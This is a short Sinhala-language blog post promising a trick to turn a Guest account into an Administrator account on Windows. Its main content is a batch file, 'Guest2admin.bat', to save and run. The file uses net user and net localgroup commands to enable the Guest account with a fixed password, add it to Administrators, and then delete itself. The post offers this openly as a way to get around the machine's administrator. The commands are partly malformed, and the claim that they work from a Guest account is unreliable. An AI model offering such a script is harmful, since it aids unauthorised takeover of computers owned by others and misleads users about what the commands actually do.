Guest ඉදන් Administrator Account එකක් Hack කරමු !

සොයන්න

30.6.11

ඔයාලා Guest account එකක් බාවිතා කරනවද ? ඔබට Administrator account එක පසුකම් ඔබේ  Guest Account  එකට ලබාගන්න මෙන්න trick එක !

  • පළමුව notepad එක open  කර ගන්න .
    • මේ codes ටික copy & paste කරන්න note pad එකට .
      

     echo off
      title Please wait...
      cls
      net user add Username Password /add
      net user localgroup Administrators Username /add
      net user Guest 420 /active:yes
      net localgroup Guests Guest /DELETE
      net localgroup Administrators Guest /add
      del %0

    • ඊළගට  Guest2admin.bat  කියන නමින් save කරන්න . 
    • Run කරන්න !
    කරලාම බලන්න !

0 comments:

Post a Comment

පරිගණක උදවු ගැන ඔබේ අදහස

PCWorld නවතම පුවත්